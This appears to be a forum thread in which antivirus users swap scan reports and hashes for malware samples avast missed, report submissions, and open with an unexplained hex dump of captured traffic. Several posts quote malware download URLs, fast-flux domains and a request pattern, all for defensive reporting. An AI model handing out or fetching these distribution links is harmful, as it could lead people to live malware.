00000100 | 7447 7A7A 7A79 7443 7944 7447 3154 3150 | tGzzzytCyDtG1T1P
00000110 | 7944 3150 7447 7943 7942 3151 7944 7447 | yD1PtGyCyB1QyDtG
00000120 | 3152 7443 314F 7945 3151 3151 7441 3152 | 1RtC1OyE1Q1QtA1R
00000130 | 7444 3153 7942 7442 744E 3049 3052 3056 | tD1SyBtBtN0I0R0V
00000140 | 3045 3052 7A75 7944 7446 7442 7442 744E | 0E0RzuyDtFtBtBtN
00000150 | 3042 3052 3057 7A75 3049 3045 3058 3050 | 0B0R0Wzu0I0E0X0P
00000160 | 304C 304F 3052 3045 7446 3045 3058 3045 | 0L0O0R0EtF0E0X0E
00000170 | 744E 3048 3154 3142 304C 304D 7A75 7443 | tN0H1T1B0L0MzutC
00000180 | 744E 3052 304E 3154 3148 3150 7A75 3152 | tN0R0N1T1H1Pzu1R
00000190 | 744F 7441 3041 744F 7944 3043 3257 314C | tOtA0AtOyD0C2W1L
000001A0 | 3147 3151 3146 3257 3142 744F 7944 3043 | 1G1Q1F2W1BtOyD0C
000001B0 | 3142 3255 3142 325A 3150 3148 7441 7442 | 1B2U1B2Z1P1HtAtB
000001C0 | 744F 7944 3043 3142 3154 3148 3145 3149 | tOyD0C1B1T1H1E1I
000001D0 | 3150 3156 7443 7446 3150 3256 3150 744E | 1P1VtCtF1P2V1PtN
000001E0 | 304C 3154 3147 314E 7A75 3045 3147 314E | 0L1T1G1Nzu0E1G1N
000001F0 | 3149 314C 3142 314D 744E 3049 3045 3056 | 1I1L1B1MtN0I0E0V
00000200 | 3150 3143 7A75 7943 7446 7444 7446 7442 | 1P1CzuyCtFtDtFtB
00000210 | 7A79 7444 7444 7446 7442 7443 7A7A 7444 | zytDtDtFtBtCzztD
00000220 | 744E 304A 3053 7A75 7443 744E 3142 325A | tN0J0SzutCtN1B2Z
00000230 | 3154 3143 325A 3150 3151 7A75 7443 744E | 1T1C2Z1P1QzutCtN
00000240 | 3142 325A 3154 3148 3145 7A75 7443 7444 | 1B2Z1T1H1EzutCtD
00000250 | 7443 7443 7441 7945 7444 7443 744E 304C | tCtCtAyEtDtCtN0L
00000260 | 304D 3156 3053 3045 3043 7A75 7442 744E | 0M1V0S0E0CzutBtN
00000270 | 3154 3145 314C 304C 3146 3154 3151 3054 | 1T1E1L0L1F1T1Q0T
00000280 | 314C 3148 3150 7A75 7945 7943 7A7A 744E | 1L1H1PzuyEyCzztN
00000290 | 3154 3145 314C 3050 3143 3146 3151 3044 | 1T1E1L0P1C1F1Q0D
000002A0 | 3154 325A 3150 7A75 7442 7444 7444 7945 | 1T2Z1PzutBtDtDyE
000002B0 | 7447 7444 7441 7447 7443 7444 744E 3154 | tGtDtAtGtCtDtN1T
000002C0 | 3145 314C 3050 3143 3146 3151 3053 314C | 1E1L0P1C1F1Q0S1L
000002D0 | 3254 3150 7A75 7945 7942 7442 7A79 7444 | 2T1PzuyEyBtBzytD
000002E0 | 7942 7A7A 744E 3145 3154 314E 3150 3048 | yBzztN1E1T1N1P0H
000002F0 | 314C 3142 325A 3146 3143 3255 7A75 3149 | 1L1B2Z1F1C2Uzu1I
00000300 | 3146 3154 3151 314C 3147 314E 3050 3154 | 1F1T1Q1L1G1N0P1T
00000310 | 314E 3150 7448 7942 7443 7A79 744F 7441 | 1N1PtHyBtCzytOtA
00000320 | 3042 3257 3150 3149 3152 3146 3148 3150 | 0B2W1P1I1R1F1H1P
00000330 | 3050 3154 314E 3150 7448 7442 7A79 7942 | 0P1T1N1PtHtBzyyB
00000340 | 744F 7441 3042 3146 314F 314F 3150 3143 | tOtA0B1F1O1O1P1C
00000350 | 3050 3154 314E 3150 7448 7443 7441 7944 | 0P1T1N1PtHtCtAyD
00000360 | 7A79 | zy
This went over port 80. Looks like a CERT?
-
http://www.virustotal.com/file-scan/report.html?id=c0ed59b993c085a9ed81dd955ac3a8d8f83992a68f8ff731330812f7bea9c4d3-1324307337
Do i need to send the file to avast.com or virus total link is ok ?
-
http://www.virustotal.com/file-scan/report.html?id=c0ed59b993c085a9ed81dd955ac3a8d8f83992a68f8ff731330812f7bea9c4d3-1324307337
Do i need to send the file to avast.com or virus total link is ok ?
send it in a password protected zip file to virus @ avast.com
mail subject: undetected sample
zip password: infected
it is recommended to use a zip program that also encrypt the file, this will prevent it form being blocked
winrar or 7zip will do this...
-
Pondus,
You can also find it here: http://forums.malwarebytes.org/index.php?showtopic=102430
contributor = osso Just searched for the MD5 hash, easy peasy,
polonus
-
Not detected unknown_file_Delivery.Pdf: http://www.virustotal.com/url-scan/report.html?id=2760a374f86eae024e9093bece8fbff9-1324426373
see: http://www.virustotal.com/file-scan/report.html?id=a507423dafb1b47af556093f48f21ded75801a0b78d1d422074a802b13079d85-1324430098
Detected by DrWeb URL scanner:
Checking: -http://academiamates.com/Delivery.zip?PuremobileIncID97089437
Engine version: 5.0.2.3300
Total virus-finding records: 2953092
File size: 47.07 KB
File MD5: 93e77bfff47d620ace7cce9c6a303fe0
-http://academiamates.com/Delivery.zip?PuremobileIncID97089437 - archive ZIP
>-http://academiamates.com/Delivery.zip?PuremobileIncID97089437/Delivery.Pdf____________________________________________________________________________________.exe infected with Trojan.Siggen3.31711
polonus
-
Trojan.Karagany
http://www.virustotal.com/file-scan/report.html?id=a31b5e52c2fb8d0f2e98a4a2ef9c5aa7e3fb1105274251cfea2167fdc910161b-1324479799 (http://www.virustotal.com/file-scan/report.html?id=a31b5e52c2fb8d0f2e98a4a2ef9c5aa7e3fb1105274251cfea2167fdc910161b-1324479799)
http://virusscan.jotti.org/en/scanresult/f3a129b6467e19ebb8f5445e4635caf5d8bd69a2 (http://virusscan.jotti.org/en/scanresult/f3a129b6467e19ebb8f5445e4635caf5d8bd69a2)
http://urlquery.net/report.php?id=12955 (http://urlquery.net/report.php?id=12955)
-
Adware Downloader
http://www.virustotal.com/file-scan/report.html?id=05aee16f88b45a8bfb81d1083fb298193d68942f1b16612b225ce2e77e6d03c5-1324483656 (http://www.virustotal.com/file-scan/report.html?id=05aee16f88b45a8bfb81d1083fb298193d68942f1b16612b225ce2e77e6d03c5-1324483656)
http://virusscan.jotti.org/en/scanresult/328f87e09b442d34377f9e1b8ae6f38ba8590946 (http://virusscan.jotti.org/en/scanresult/328f87e09b442d34377f9e1b8ae6f38ba8590946)
http://www.threatexpert.com/report.aspx?md5=38a7083ec6feb55dfca2a0c2607701e4 (http://www.threatexpert.com/report.aspx?md5=38a7083ec6feb55dfca2a0c2607701e4)
-
Hi razoreqx,
Is this report somehow related to it? see: http://www.threatexpert.com/report.aspx?md5=5281fd5adcfc75202622bc586043e282
See: http://jsunpack.jeek.org/dec/go?report=d495bbeb8ebb44c204e25422b65d814d1f220d0e
polonus
-
Hi razoreqx,
Is this report somehow related to it? see: http://www.threatexpert.com/report.aspx?md5=5281fd5adcfc75202622bc586043e282
See: http://jsunpack.jeek.org/dec/go?report=d495bbeb8ebb44c204e25422b65d814d1f220d0e
polonus
\
I just got that back about 10 mins ago.. You're fast
-
Not bashing CNET but anything that modifies my firewall rules, and without asking I have an issue with!
http://www.virustotal.com/file-scan/report.html?id=751850a5e527c5987201d400fae2ac8aab0f644a042af89c2e02aaa757f06ea3-1324494179 (http://www.virustotal.com/file-scan/report.html?id=751850a5e527c5987201d400fae2ac8aab0f644a042af89c2e02aaa757f06ea3-1324494179)
http://www.threatexpert.com/report.aspx?md5=bb411fef75d17a07bc82da72b67919cc (http://www.threatexpert.com/report.aspx?md5=bb411fef75d17a07bc82da72b67919cc)
http://virusscan.jotti.org/nl/scanresult/d443623bd73f4f10a8caa76b5902bf5d1524716a (http://virusscan.jotti.org/nl/scanresult/d443623bd73f4f10a8caa76b5902bf5d1524716a)
http://support.clean-mx.de/clean-mx/viruses.php?domain=we-care.com&sort=email%20asc (http://support.clean-mx.de/clean-mx/viruses.php?domain=we-care.com&sort=email%20asc)
https://anubis.iseclab.org/?action=result&task_id=174430ff4cd876654254372d4c6abb2de&format=html (https://anubis.iseclab.org/?action=result&task_id=174430ff4cd876654254372d4c6abb2de&format=html)
http://urlquery.net/report.php?id=12984 (http://urlquery.net/report.php?id=12984)
-
Hi razoreqx,
This is what I get back from abad iFrame detektor scan:
Check took 6.06 seconds
(Level: 0) Url checked:
-http://we-care.com
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.we-care.com/templates/ac_runactivecontent.js
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.we-care.com/templates/wc.js
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.we-care.com/templates/fat.js
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://we-care.com//scripts/jquery.js
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://tag.didit.com/js/tman_iframe.js
Zeroiframes detected on this site: 1
No ad codes identified
(Level: 2) Url checked: (iframe source)
-http://tag.didit.com/js/+d+
Blank page / could not connect
No ad codes identified
(Level: 2) Url checked: (script source)
-http://tag.didit.com/js/+scriptstr;jscall+=&tmlogit=0;if(tmparam.tmcampid||tmparam.levrev||tmparam.levresdes)window.tmcbrequired=1;jscall+=&tmtag=js
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
-http://www.google-analytics.com/urchin.js
Zeroiframes detected on this site: 0
No ad codes identified
see (embed) -cdn.we-care.com/Content/SWF/titles.swf?tvalue=Responsible+Shopping+and+the+We-Care.com+Community&tcolor=0xFF6600
All there will redirect eventually to appnexus.com an ad retargeter with not such a very good web rep:
http://www.mywot.com/en/scorecard/appnexus.com
http://www.webutation.net/go/review/appnexus.com
polonus
-
Avast does not detect this SpyEye binairy:
http://www.virustotal.com/url-scan/report.html?id=c37f975f900b98d2b5d61a18f69c1e2b-1324488656
and
http://www.virustotal.com/file-scan/report.html?id=e4767c0989108a271011e117871e0fad141bd44ec3a119080e2bac864a7b0ad3-1324492270
Anubis report from SpyEyeTracker: http://anubis.iseclab.org/?action=result&task_id=13c4c9e7e7c442f5419f26785d839c2cc
polonus
-
The link is dead now
http://www.virustotal.com/url-scan/report.html?id=c37f975f900b98d2b5d61a18f69c1e2b-1324505134
-
Hi Pondus,
You are right status: offline. But avast did not have had it, if it had been up and alive,
pol
-
sooner or later they recive it from VT
-
What? CNET is messing firewall rules? Is it posible? Am I reading correctly?
-
What? CNET is messing firewall rules? Is it posible? Am I reading correctly?
User desktop firewalll... Not parameter fw... the details are in the sandbox output
-
http://www.virustotal.com/file-scan/report.html?id=d9c38651d8b9e3bfb50eb19070e49398599f60b2413554e6cf0103f4680ba8da-1324560750 (http://www.virustotal.com/file-scan/report.html?id=d9c38651d8b9e3bfb50eb19070e49398599f60b2413554e6cf0103f4680ba8da-1324560750)
Sample sent
-
Not detected: TR/Hijacker.Gen
See: http://www.virustotal.com/url-scan/report.html?id=5c6dd3a08ed1467955086049015a5d38-1324677601
and
http://www.virustotal.com/file-scan/report.html?id=1221916ed2f4bcab2141e378aa0670601742fdad787c0b7d59dc93f977125ea8-1324681317
See: http://reports.antivirus-lab.com/13726/winudapter-exe-2/
polonus
-
Polonus: we'll never thank you enough for helping improving deteccion. Merry Christmas.
-
Polonus: we'll never thank you enough for helping improving deteccion. Merry Christmas.
+1 :)
-
Polonus should be a virus analyst in this case ::) ;D
-
Hi forum friends,
Missed PUA.Script.PDF.EmbeddedJavaScript, see: http://www.virustotal.com/url-scan/report.html?id=a19a42caa602f40334b29884f0e44d51-1324851413
and
http://www.virustotal.com/file-scan/report.html?id=27d65ecd5ad0142f541e3b896651ad143522b3c80862c95c7c3310bcd592c723-1324855026
See: http://urlquery.net/queued.php?id=13411 verdict malicious
compressed Filter/FlateDecode stream object
polonus
-
Good catch. - Defintely malware..!!! ;)
-
Hi Asyn,
Hope this will help avast detection. Especially users with older Adobe Reader and Acrobat versions are vulnerable to the exploits used here: Collab.collectEmailInfo() JavaScript Overflow (CVE-2007-5659) and Util.printf() JavaScript Overflow (CVE-2008-2992).
This malware takes advantage of a vulnerability to remotely access or attack a program, computer or server,
Damian
-
See: http://www.virustotal.com/url-scan/report.html?id=1c99945185ca03882745329c8e2b15ce-1325103177
and
http://www.virustotal.com/file-scan/report.html?id=f5ffb9d7575551b6470a92b9213a47f78f0a8910b4fa11f9295d758c33ab0f27-1325106790
unknown exe See: http://www.threatexpert.com/report.aspx?md5=8aac478bb8ba38a3b03a3d30cda9b510
polonus
-
optimize virustotal .... :>
https://new.virustotal.com/ (https://new.virustotal.com/)
Java fake
http://virusscan.jotti.org/en/scanresult/288920b9ae922935e775d529b182ae30f40655b7
-
Nice the new https VT now has a 32MB upload limit.
Just hope they beef up the server as the load gets horrendous at times and this page took some time just to load, haven't tried submitting anything yet.
-
Hi DavidR,
Did they also fix the problem with loading newer VT result links?
polonus
-
I have no idea, as I said I haven't submitted anything so I didn't have a results link to test. But I honestly don't know what is going on with the links as I had never experienced the problem.
-
https://new.virustotal.com/file/9e243a83be426211ed22b9e41e3a0d9dbee713412429014a16291632a296e6d6/analysis/1325226582/
Malwarebytes' Anti-Malware - Java fake
-
Well the link works, which is a good first step on the new.vt, the server is still slow. Don't particularly like the new layout too big and expanded, too much white space.
I like the additional information at the bottom is nice, this one is a bit of a strange beast as it give information on the "Sigcheck digital signature information" and this is saying it has a digital signature.
publisher................: Sun Microsystems, Inc.
product..................: Java(TM) Platform SE 6 U26
internal name............: javaw
copyright................: Copyright (c) 2011
original name............: javaw.exe
file version.............: 6.0.260.3
description..............: Java(TM) Platform SE binary
All the other info pulled from the file also indicates it is a Sun File, if it is a fake, they have gone to extraordinary lengths. But given its file size it is very large 888KB for javaw.exe (so suspect). I have an old copy for javaw.exe jre6 update 27 and that is only 141KB and that comes up clean on VT.
Since virtually all of the detections are generic/heuristic/crypt/packer. I would certainly send it to http://anubis.iseclab.org/?action=home (http://anubis.iseclab.org/?action=home) for further detailed analysis.
-
Does anyone wonder why Burkoff has the avast! revolving icon in his signature: ???
http://images.backata.com/image-62A6_4D301DF5.gif
-
Does anyone wonder why Burkoff has the avast! revolving icon in his signature: ???
http://images.backata.com/image-62A6_4D301DF5.gif
Thats not a VT link! ::)
Well the link works, which is a good first step on the new.vt, the server is still slow. Don't particularly like the new layout too big and expanded, too much white space.
+1
-
Hi folks,
And as yet not fully functional for searching on a URL for file scan results. Asked jotti in a mail to come up with a url scan link function as well, but the man there said as for now they cannot find the time to do it. Only alternative I have is Garyshood Online Virus Scanner with URL scan (hampered now because depending on VT reults?). This scanner - http://urlscan.chanret.com/ seems only to have DrWeb URL scanner results implemented, and I advise against the use of it because avast Web shield may alert the search results it delivers, for instance JS:Redirector-MX[Trj] was found when scanning for results on scanning JS/Agent.aln ARIN AR ivitor at -towebs.com 200.62.54.127 to 200.62.54.127 -dentalflores.com.ar -http://dentalflores.com.ar (also blocked by Google Safebrowsing by the way - and WOT, see: http://www.webutation.net/go/review/dentalflores.com.ar )
polonus
-
Not detected by avast, TR/Spy.Gen, see: http://www.virustotal.com/url-scan/report.html?id=85e70e0b4afa97e773d99020e167cbf9-1325334179
and http://www.virustotal.com/file-scan/report.html?id=438f18f570c9365f407a588825812c457494b714e158a8f4f69946e79783a51e-1325337792
Also see:
http://camas.comodo.com/cgi-bin/submit?file=438f18f570c9365f407a588825812c457494b714e158a8f4f69946e79783a51e&iframe=
reported to virus AT avast dot com
polonus
-
Not detected: http://www.virustotal.com/url-scan/report.html?id=b80dc2cfd03eb0d9a04f093379690f87-1325607516
and
http://www.virustotal.com/file-scan/report.html?id=10975776bf2e7e52cddf98dac34aff6fd6959909f92dbbf508fe0c4ba4dc7683-1325611195
infected with TR/Dropper.Gen
reported to virus AT avast dot com
see also: http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-ULS/detailed-analysis.aspx
&
http://www.threatexpert.com/report.aspx?md5=b65bb482a940ab00705271151ee88d85
polonus
-
undetected malware:
https://new.virustotal.com/file/904d9840f39231f253cef9f57c374936a3b3ba4927f8da5bf0d39a8a17e40889/analysis/1325623059/
-
undetected malware:
https://new.virustotal.com/file/904d9840f39231f253cef9f57c374936a3b3ba4927f8da5bf0d39a8a17e40889/analysis/1325623059/
AVG had catched it! Respect!
But is that real threat?
-
Hi avastfan18,
It is a fake av ransom trojan, so a real threat. Dit you forward this to virus AT avast dot com?
polonus
-
Hi avastfan18,
It is a fake av ransom trojan, so a real threat. Dit you forward this to virus AT avast dot com?
polonus
Hopefully JuninhoSlo already did send it. ;)
-
Hi avastfan18,
It is a fake av ransom trojan, so a real threat. Dit you forward this to virus AT avast dot com?
polonus
Hopefully JuninhoSlo already did send it. ;)
I sent UD malware -via:
-email
-chest
-http://www.avast.com/contacts
-
Hi JuninhoSlo,
Thanks for adding to avast detection,
pol
-
Hi JuninhoSlo,
Thanks for adding to avast detection,
pol
Any time ;)
-
unknown_file_$INSTDIR/Winup.exe not detected by avast:
http://vscan.urlvoid.com/analysis/c692522ec46913bc0b05febb718e6b2d/d2ludXBiZy13cDAxNi1leGU=/
see: http://www.virustotal.com/url-scan/report.html?id=e8a3bc64470f99c3bcc6600a17b52b72-1325773847
& http://www.virustotal.com/file-scan/report.html?id=70d89418677bb8ba0dd76f2be0e50df0cb3a9cc8aa73bec8e4db3915da83c850-1325777542
& http://anubis.iseclab.org/?action=result&task_id=149d599224d926784c1d77666c679ec32
See: http://camas.comodo.com/cgi-bin/submit?file=70d89418677bb8ba0dd76f2be0e50df0cb3a9cc8aa73bec8e4db3915da83c850
See: http://siteinspector.comodo.com/public/tasks/81175 with this last scan nothing found
reported to virus AT avast dot com
polonus
-
I get a new VT result via the MD5 hash: http://www.virustotal.com/file-scan/report.html?id=70d89418677bb8ba0dd76f2be0e50df0cb3a9cc8aa73bec8e4db3915da83c850-1325794663
VT Community Opinions differ - 50% goodware 50% malware
&
http://camas.comodo.com/cgi-bin/submit?file=70d89418677bb8ba0dd76f2be0e50df0cb3a9cc8aa73bec8e4db3915da83c850&iframe=
See: http://www.threatexpert.com/report.aspx?md5=43d3f031ab9e1bd78ce82c55ca564997
seen as low risk, could it be riskware or even a PUP?
pol
-
Trojan-Downloader.Win32.Karagany
http://www.virustotal.com/file-scan/report.html?id=ac1dc4d0c949f3d801f3220dc05d89e9cd0e261a3a1d24b2e999a70125aae1ad-1325849510 (http://www.virustotal.com/file-scan/report.html?id=ac1dc4d0c949f3d801f3220dc05d89e9cd0e261a3a1d24b2e999a70125aae1ad-1325849510)
http://urlquery.net/report.php?id=14831 (http://urlquery.net/report.php?id=14831)
-
http://www.virustotal.com/file-scan/report.html?id=486924457c58d4c9a5d23e287fb3eff8efaaa098c55987c4bc39a0f04a3c6d70-1325869063 (http://www.virustotal.com/file-scan/report.html?id=486924457c58d4c9a5d23e287fb3eff8efaaa098c55987c4bc39a0f04a3c6d70-1325869063)
http://anubis.iseclab.org/?action=result&task_id=19d59e40e7a331b4465decf76ba5923f8&format=html (http://anubis.iseclab.org/?action=result&task_id=19d59e40e7a331b4465decf76ba5923f8&format=html)
Fake.AV
Submitted.
-
See: https://new.virustotal.com/url/204247e99fbb5985046cce37b742b2433794c68cd9e4ff876a48887f8cab9391/analysis/1325883253/
and
http://vscan.urlvoid.com/analysis/7139ee9bad5b095c589c316ec27de84a/YWdlbmRhLWV4ZQ==/
See: https://new.virustotal.com/file/e4abc9d2a62fd7775738f6b36931ea14ab4b29bca2e6394f338f9508757deb63/analysis/
See: -http://jsunpack.jeek.org/?report=043e665c96f3f6945e7b09f61cc25f1649ee6b85
Visit above link only when security savvy, with ample script protection and in a VM,
reported to virus AT avast dot com,
polonus
-
Not detected by avast, TR/Spy.Banker.53248.13, should be detected as Win32:Malware-gen, see:
http://vscan.urlvoid.com/analysis/376702393caa1d8f6800b5bf7125765d/YXNzaXN0aXItYW9zLXZpZGVvcy1pZHMtMDAwMTIw/
See: https://new.virustotal.com/url/95ada4f72abcb65054e5241dec30309e07e8072ed3c9b9a0a8ff3c32b25320de/analysis/1325888647/
DrWeb URL checker flags: Checking: -http://198.106.204.222/view/videos/downloads/Assistir_AoS_Videos=iDs=00012012_.exe
Engine version: 7.0.0.11250
Total virus-finding records: 2511482
File size: 52.00 KB
File MD5: 376702393caa1d8f6800b5bf7125765d
-http://198.106.204.222/view/videos/downloads/Assistir_AoS_Videos=iDs=00012012_.exe infected with Trojan.DownLoader5.31000
and in this case avast does detect: http://www.virustotal.com/file-scan/report.html?id=142e69c070aa3d418a1f8fdcb121ec6aaf2c1b19572dcb7f7ba25bdbd45b5a0e-1325886727
as: Win32:Malware-gen
polonus
-
Re: https://new.virustotal.com/url/bf8f68458cdf3d1be3b1aad36f072033c4c6a1f94c5eb08ff7dcdc69b5a67ecf/analysis/1325976924/
and
http://www.virustotal.com/file-scan/report.html?id=c2c7eda4fc5f34f3e6e734d907e2eff642d78ebda1a75a904c5b31350557621e-1325970284
See: http://vscan.urlvoid.com/file/ec6a2d79b13d3dd8427cc0413dcdde4b/bWUyc3VwcG9ydGVyLWV4ZQ==/
It is Trojan-Banker.Win32.Banker
polonus
-
Trojan/Win32.Blocker not detected: http://www.virustotal.com/file-scan/report.html?id=c56bcc8b9cb97bb6df30f18dd4360e36614b2e058203547f6f3da00a427248eb-1326043721
polonus
-
undetected malware
http://www.virustotal.com/file-scan/report.html?id=37b8446d6f82c77fa9ff88417af08aa5faef69bf6c86138d2460d2ee7c95e5fb-1326307856
-
undetected malware
http://www.virustotal.com/file-scan/report.html?id=37b8446d6f82c77fa9ff88417af08aa5faef69bf6c86138d2460d2ee7c95e5fb-1326307856
http://www.isthisfilesafe.com/md5/66CBC40C85B9163CB9275367663D5E2F_details.aspx (http://www.isthisfilesafe.com/md5/66CBC40C85B9163CB9275367663D5E2F_details.aspx)
Good find
-
trojan.zbot.
Trojan.Danmec
https://www.virustotal.com/file/f582e283d9da5d9d7031f93d7ce4f973f45f0b461e7118b23e2b5509d48f7fa8/analysis/ (https://www.virustotal.com/file/f582e283d9da5d9d7031f93d7ce4f973f45f0b461e7118b23e2b5509d48f7fa8/analysis/)
http://urlquery.net/report.php?id=15840 (http://urlquery.net/report.php?id=15840)
Uploaded
-
#W32/Yakes.
https://www.virustotal.com/file/b084faf441fc3c68f3a2cd6f4fb66dfe6e07084217a0a3176d37cc405c061253/analysis/1326389697/ (https://www.virustotal.com/file/b084faf441fc3c68f3a2cd6f4fb66dfe6e07084217a0a3176d37cc405c061253/analysis/1326389697/)
Submited
-
https://www.virustotal.com/file/bcbfc3882cb3d8b3e6188f3a46bfbb2e6f16c0e6c4cfbedcc8279a49d049b250/analysis/1326390293/ (https://www.virustotal.com/file/bcbfc3882cb3d8b3e6188f3a46bfbb2e6f16c0e6c4cfbedcc8279a49d049b250/analysis/1326390293/)
#Rogue.FakeRean
Submited
-
Winlock
https://www.virustotal.com/file/a2d90463b7acce176af1933d8539e9e1f653d5ba8dcf8b71c0b5c5553dd30277/analysis/
https://www.virustotal.com/file/8c1c8c27093257f9d21d3dc57e798f04bfb9c3b5e198aa5343d505d17a595c3c/analysis/1326400820/
https://www.virustotal.com/file/829243518e7f1a51f79cfc2ea5cec218be3c136fd12696ef7daa7546f0a12ddd/analysis/1326400847/
https://www.virustotal.com/file/ca97030ba892535e784a1cbcfce5c0c2359f711bbca2ab9defcefbe2e08a91ee/analysis/1326400854/
https://www.virustotal.com/file/d96de5ab60bb93855840a00893ba8a42e47b676bd93da9984dbbf5e56dfc7d93/analysis/1326430284/
Submited
-
Dim@rik,
It is a pity that the use of this tool was not mentioned: http://support.kaspersky.com/faq/?qid=208282275 in the case of this reported: https://www.virustotal.com/file/ca97030ba892535e784a1cbcfce5c0c2359f711bbca2ab9defcefbe2e08a91ee/analysis/ This special decryptor tool was designed for these trojans - scanner download at site there, link source Kaspersky Support...
polonus
-
Dim@rik,
It is a pity that the use of this tool was not mentioned: http://support.kaspersky.com/faq/?qid=208282275 in the case of this reported: https://www.virustotal.com/file/ca97030ba892535e784a1cbcfce5c0c2359f711bbca2ab9defcefbe2e08a91ee/analysis/ This special decryptor tool was designed for these trojans - scanner download at site there, link source Kaspersky Support...
polonus
Good day Polonus
No, not much so, that you have a link to the utility for deciphering virus cryptor.
A Winlock look like this https://www.drweb.com/xperf/unlocker/gallery/
Just like Trojans and I sent.
-
Malware EXP/SWF.AS not found by avast - low detection anyway:
https://www.virustotal.com/url/4533dedc7b44843bc1a6bfa417e00e61c2a9ebb5db863f72937671579a2f606f/analysis/1326562266/
see: https://www.virustotal.com/file/42fdb8be709abed7a12a8c76e9e4ff5b85a54c659862c59a25b2f09baebef0df/analysis/
see: http://vscan.urlvoid.com/analysis/689f5374450115b9a3f90024883732af/Mjc=/
Also see: https://www.virustotal.com/file/b191f7b5bde474869140f30165b6ae9879cb6af3073c0abc05650c585172fb28/analysis/
reported to virus AT avast dot com with all other instances at VW,
polonus
Goodware blackhole to discredit av detections: https://www.virustotal.com/file/42fdb8be709abed7a12a8c76e9e4ff5b85a54c659862c59a25b2f09baebef0df/analysis/
-
undetected malwares
https://www.virustotal.com/file/a641219006c0c8d76c3f0b610f11f15140eb7ce673b97d8ab97f6e53abb3e81b/analysis/1326651018/
https://www.virustotal.com/file/4ad877a8587e1baa288b5c89545d07d299f293b514f195e5088d9a8d6d1d4249/analysis/1326653818/
https://www.virustotal.com/file/eb7aa41abeabfaa9cdeb8758cba25678ef071e6dd96475facd26185002311424/analysis/1326654974/
-
Hi JuninhoSlo,
The first one was this: http://threatcenter.crdf.fr/?More&ID=64651&D=CRDF.Trojan.Win32.PEx.91916191925
Related to this: http://research.sunbelt-software.com/partnerresource/MD5.aspx?md5=387fb9d8f1969d118c3abcf4da46e9a2 or this: http://vms.drweb.com/virus/?i=1719341
polonus
-
Rogue.FakeRean
https://www.virustotal.com/file/11cb777880e1abfd1a9285fb98b598e6e7d5b5c25b11ef4610d3ea695e6dcba2/analysis/1326802024/ (https://www.virustotal.com/file/11cb777880e1abfd1a9285fb98b598e6e7d5b5c25b11ef4610d3ea695e6dcba2/analysis/1326802024/)
-
Not detected by avast: http://vscan.urlvoid.com/analysis/ab9403919144c1d4f9dd2d4378a452c8/ZnR1MTAwNC1leGU=/
reported to virus AT avast dot com,
polonus
P.S. Detected as PUP see: https://www.virustotal.com/file/d6474fe7b8ec47bf8152f197cb83f99c7af5f7a32548a73963ec145faefdb14f/analysis/
-
Submited.
Trojan.Karagany
https://www.virustotal.com/file/24c09d3920beee4b5c5e3b56a7a095c737bdaca3766ae2880c6cf12d4bb7aa70
-
submitted.
#rogue.Fake.HDD
https://www.virustotal.com/file/96f825b5810eb220ae7fb6e2a148261b009ab564f507ca57ede7db4562acc937/analysis/1327001583/ (https://www.virustotal.com/file/96f825b5810eb220ae7fb6e2a148261b009ab564f507ca57ede7db4562acc937/analysis/1327001583/)
new Fake.HDD fast flux campaign.
livofotaltv.com
onelenolecubs.com
wautilber.com
withijs.com
RGX:
GET /britx/a HTTP1.1
-
Cidox
https://www.virustotal.com/file/41aaf73598c481bfc9633a6be45fce76aedc29e0063afb3a171ee8dd78940382/analysis/1327327826/
https://www.virustotal.com/file/6cc87cfe04023d7189b2c3f6a547bc81ba0ff7ed5ca7d7dd88686962f8d79c7e/analysis/1327328072/
https://www.virustotal.com/file/ae4c86f1ceb2228f2f11175a9901918ee7a2ba28cf56787b9724e4377bf95d88/analysis/1327328173/
Some samples sent on Saturday morning and Avast are not defined.
Slow processing of samples.
-
https://www.virustotal.com/file/10548bcbd80a9a8144d76e8d34700b77de70216285bed1268b5be17f11b35e94/analysis/1327587770/ (https://www.virustotal.com/file/10548bcbd80a9a8144d76e8d34700b77de70216285bed1268b5be17f11b35e94/analysis/1327587770/)
Sample Sent
-
Trojan winlock.V not detected by avast:
https://www.virustotal.com/file/b4b2ce263e475515e687f3f75bc33ce5537cc55a6e376d1dce08abb6f679f728/analysis/
polonus
-
Submitted
https://www.virustotal.com/file/63dddb0a63c8b451bf115907c50f5516bcc8d7ed070b12f870c0ad6de9f3d598/analysis/ (https://www.virustotal.com/file/63dddb0a63c8b451bf115907c50f5516bcc8d7ed070b12f870c0ad6de9f3d598/analysis/)
-
Nothing detected here: http://vscan.urlvoid.com/analysis/78314d320bcecf33c5ab83bd678b1081/MzI=/
flagged as Trojan-Ransom.Win32.Foreign.xy by kaspersky's
Suspicious: http://urlquery.net/report.php?id=18597
See: http://anubis.iseclab.org/?action=result&task_id=137ec74bf307e2cf411f8a83b60ef88a5&format=html
VT results:
https://www.virustotal.com/file/04fc3e16bda3568cf5be72a031eda73fab5908ade5e1c7b627bded8480a04fce/analysis/
reported to virus at avast dot com,
polonus
-
https://www.virustotal.com/file/efbe07b84aa9e5fab4497ac9f639907d3eb7e97494392b62d94e177d345f1764/analysis/1328109225/ (https://www.virustotal.com/file/efbe07b84aa9e5fab4497ac9f639907d3eb7e97494392b62d94e177d345f1764/analysis/1328109225/)
Submited
-
https://www.virustotal.com/file/6b864aab9ac841074a6e9aeae39b2bdce95441369965fd9e3482443469ac5585/analysis/1328155272/
https://www.virustotal.com/file/2a4e71017ec0eea41a8b71e6f20ba821ca57c71b28529aca3170e2c0010afe9d/analysis/1328155287/
https://www.virustotal.com/file/33806dd561edd18b83668cd026c68d44324ab159b5d260d7205c23d5784a2588/analysis/1328155306/
https://www.virustotal.com/file/b4fa589bbd3ade90acb3e7f3ff61287d5aab749e0d78685e6e9f71a5716da23a/analysis/1328155319/
https://www.virustotal.com/file/5228e85720fbb7b1e66e0852faab2a879ddb55289d5b454f36603967778e4d03/analysis/1328155332/
https://www.virustotal.com/file/6d295b677c9092338b2e882d9c8831a00cda9e39fce0d81df78c4d16f061b33c/analysis/1328155341/
Submited
-
